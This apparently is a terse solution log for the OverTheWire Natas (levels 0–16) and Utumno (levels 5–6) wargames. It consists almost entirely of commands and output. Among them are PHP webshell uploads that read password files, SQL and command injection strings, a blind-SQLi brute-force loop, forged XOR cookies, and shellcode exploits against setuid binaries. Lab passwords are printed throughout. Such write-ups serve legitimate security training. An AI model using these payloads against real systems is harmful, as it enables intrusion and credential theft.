# Natas wargame: Level 11 to 16


Level 11

# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data "submit=&bgcolor=#ffffff" --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org
# cat xor_encrypt
#!/usr/bin/php
<?php
$key=json_encode(array("showpassword"=>"no","bgcolor"=>"#ffffff"));
$text=base64_decode($argv[1]);
$outText="";
for($i=0;$i<strlen($text);$i++){
        $outText.=$text[$i]^$key[$i%strlen($key)];
}
echo $outText;
?>
# grep natas natas11.cookie
natas11.natas.labs.overthewire.org      FALSE   /       FALSE   0       data    ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
# ./xor_encrypt ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw
qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
# cat set_cookie
#!/usr/bin/php
<?php
$key=$argv[1];
$text=json_encode(array("showpassword"=>"yes","bgcolor"=>"#ffffff"));
$outText="";
for($i=0;$i<strlen($text);$i++){
        $outText.=$text[$i]^$key[$i%strlen($key)];
}
echo base64_encode($outText);
?>
# ./set_cookie qw8J
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
# string=`./set_cookie qw8J`
# sed -i "s/data\t.*%3D/data\t$string/" natas11.cookie
# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data 'submit=&bgcolor=#ffffff' --load-cookies natas11.cookie --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org | grep natas12 | awk '{print $6}' | cut -b -32
sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu
Level 12

# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: application/x-php\r\n\r\n<?php readfile("/etc/natas_webpass/natas13");?>\r\n--#--\r\n\r\n' http://natas12.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/oijrt0cyhv.php
# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu http://natas12.natas.labs.overthewire.org/upload/oijrt0cyhv.php
IGCXqS4x472aoHZYaidvmeoWj2GmuRYz
Level 13

# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: image/jpg\r\n\r\n'"`echo -n "ffd8ff" | xxd -p -r`"$'<?php readfile("/etc/natas_webpass/natas14");?>\r\n--#--\r\n\r\n' http://natas13.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/pmg8woiyek.php
# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz http://natas13.natas.labs.overthewire.org/upload/pmg8woiyek.php | cut -b 4-
sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
Level 14

# curl --silent --user natas14:sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh --request POST --data "username=\"or true#" http://natas14.natas.labs.overthewire.org | grep natas15 | awk '{print $8}' | cut -b -32
m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV
Level 15

# j=1; while [ true ]; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and length(password)=$j#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo $j; break; fi; j=$[$j+1]; done
32
# for i in `seq $j`; do for k in `seq 33 126`; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and ascii(substr((select password),$i,1))=$k#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo "obase=16;ibase=10;$k" | bc -l | xxd -p -r ; break; fi; done; done; echo
3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L
Level 16

# wget --quiet -O - --user=natas16 --password=3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L --post-data 'submit=&needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org > /dev/null
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;cat /tmp/natas17;' http://natas9.natas.labs.overthewire.org | grep -v -e ^$ -e ^\< | tail -n 1
9HBzt5ljtPAgmaYvNfZ8chZVq50oepsx




# Natas wargame: Level 0 to 10


Level 0

# wget --quiet -O - --user=natas0 --password=natas0 http://natas0.natas.labs.overthewire.org | grep natas1 | awk '{print $6}'
9hSaVoey44Puz0fbWlHtZh5jTooLVplC
Level 1

# wget --quiet -O - --user=natas1 --password=9hSaVoey44Puz0fbWlHtZh5jTooLVplC http://natas1.natas.labs.overthewire.org | grep natas2 | awk '{print $6}'
aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl
Level 2

# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org | grep files
<img src="files/pixel.png">
# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org/files
# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org/files/users.txt | grep natas3 | awk -F\: '{print $2}'
lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb
Level 3

# wget --quiet -O - --user=natas3 --password=lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb http://natas3.natas.labs.overthewire.org/robots.txt | grep Disallow
Disallow: /s3cr3t/
# wget --quiet -O - --user=natas3 --password=lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt | grep natas4 | awk -F\: '{print $2}'
8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz
Level 4

# wget --quiet -O - --user=natas4 --password=8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz --referer=http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org | grep natas5 | awk '{print $8}'
V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z
Level 5

# wget --quiet -O - --user=natas5 --password=V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --keep-session-cookies --save-cookies natas5.cookie http://natas5.natas.labs.overthewire.org
# sed -i 's/0$/1/' natas5.cookie
# wget --quiet -O - --user=natas5 --password=V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --keep-session-cookies --load-cookies natas5.cookie http://natas5.natas.labs.overthewire.org | grep natas6 | awk '{print $8}' | awk -F\< '{print $1}'
mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU
Level 6

# wget --quiet -O - --user=natas6 --password=mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU http://natas6.natas.labs.overthewire.org/includes/secret.inc | grep secret | awk -F\" '{print $2}'
FOEIUWGHFEEUHOFUOIU
# wget --quiet -O - --user=natas6 --password=mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU --post-data 'submit=&secret=FOEIUWGHFEEUHOFUOIU' http://natas6.natas.labs.overthewire.org | grep natas7 | awk '{print $8}'
XLoIufz83MjpTrtPvP9iAtgF48EWjicU
Level 7

# wget --quiet -O - --user=natas7 --password=XLoIufz83MjpTrtPvP9iAtgF48EWjicU http://natas7.natas.labs.overthewire.org | grep natas8
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
# wget --quiet -O - --user=natas7 --password=XLoIufz83MjpTrtPvP9iAtgF48EWjicU http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8 | grep -v -e \< -e ^$
maabkdexUStb6JJXUqmBx7Re8M61cksn
Level 8

# wget --quiet -O - --user=natas8 --password=maabkdexUStb6JJXUqmBx7Re8M61cksn http://natas8.natas.labs.overthewire.org/index-source.html | sed -e 's/color/\n/g' | grep -m 1 DD0000 | awk -F\" '{print $3}'
3d3d516343746d4d6d6c315669563362
# echo -n "3d3d516343746d4d6d6c315669563362" | xxd -p -r | rev | base64 --decode && echo
oubWYf2kBq
Level 9

# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;/usr/bin/find / | /bin/grep natas10;' http://natas9.natas.labs.overthewire.org | grep natas10
/var/www/natas/natas10
/home/natas10
/home/natas10/.bashrc
/home/natas10/.bash_logout
/home/natas10/.profile
/etc/apache2/sites-available/VHOST.natas10.natas.labs.overthewire.org
/etc/apache2/sites-enabled/VHOST.natas10.natas.labs.overthewire.org
/etc/natas_webpass/natas10
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;/bin/echo "#$(/bin/cat /etc/natas_webpass/natas10)#";' http://natas9.natas.labs.overthewire.org | awk -F\# '{print $2}' | grep -v ^$
s09byvi8880wqhbnonMFMW8byCojm8eA
Level 10

# wget --quiet -O - --user=natas10 --password=s09byvi8880wqhbnonMFMW8byCojm8eA --post-data 'submit=&needle=. /etc/natas_webpass/natas11 #"' http://natas10.natas.labs.overthewire.org | grep -v -e ^\< -e ^$ | tail -n 1
SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6

# Utumno wargame: Level 6


# ssh utumno6@utumno.labs.overthewire.org
utumno6@utumno.labs.overthewire.org's password:65696c75717569657468

utumno6@melissa$ file /utumno/utumno6
/utumno/utumno6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno6@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno6@melissa$ /tmp/u6/getenvaddr EGG /utumno/utumno6
EGG will be at 0xffffd977
utumno6@melissa$ /utumno/utumno6 `perl -e 'print "-1 ffffd6ac \x77\xd9\xff\xff" . "\xff"x60 . "\x77\xd9\xff\xff"'`
Table position -1 has value -9865
Description: 1À°
                Rh//shh/binãRâSáÍ
$ /usr/bin/whoami
utumno7
$ /bin/cat /etc/utumno_pass/utumno7
746f7469717565676165

# Utumno wargame: Level 5


# ssh utumno5@utumno.labs.overthewire.org
utumno5@utumno.labs.overthewire.org's password:776f756361656a69656b

utumno5@melissa$ file /utumno/utumno5
/utumno/utumno5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno5@melissa$ mkdir /tmp/u5
utumno5@melissa$ cd !$
utumno5@melissa$ cat execve2.c
#include <unistd.h>
int main(){
        char *args[4];
        char *env[12];
        args[0]="/tmp/u5/getenvaddr";
        args[1]="EGG";
        args[2]="/utumno/utumno5";
        args[3]="NULL";
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xa1\xa2\xa3\xa4";
        env[10]="EGG=\xb1\xb2\xb3\xb4\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        execve("/tmp/u5/getenvaddr",args,env);
}
utumno5@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2])); // *2 -> Name only in argv but not in env var
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}
utumno5@melissa$ gcc -m32 -o execve2 execve2.c && gcc -m32 -o getenvaddr getenvaddr.c
utumno5@melissa$ ./execve2
EGG will be at 0xffffdfc9
utumno5@melissa$ gdb -q
(gdb) #>address+shellcode
(gdb) print /x 0xffffdfc9 - 0x4
$1 = 0xffffdfc5
(gdb) #>EGG=address+shellcode
(gdb) print /x 0xffffdfc9 + 0x4
$2 = 0xffffdfcd
(gdb) #>shellcode
utumno5@melissa$ cat execve.c
#include <unistd.h>

int main(){
        char *env[12];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc5\xdf\xff\xff";
        env[10]="EGG=\xcd\xdf\xff\xff\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        execve("/utumno/utumno5",NULL,env);
}
utumno5@melissa$ gcc -m32 -o execve execve.c
utumno5@melissa$ ./execve
Here we go - Åßÿÿ
$ /usr/bin/whoami
utumno6
$ /bin/cat /etc/utumno_pass/utumno6
65696c75717569657468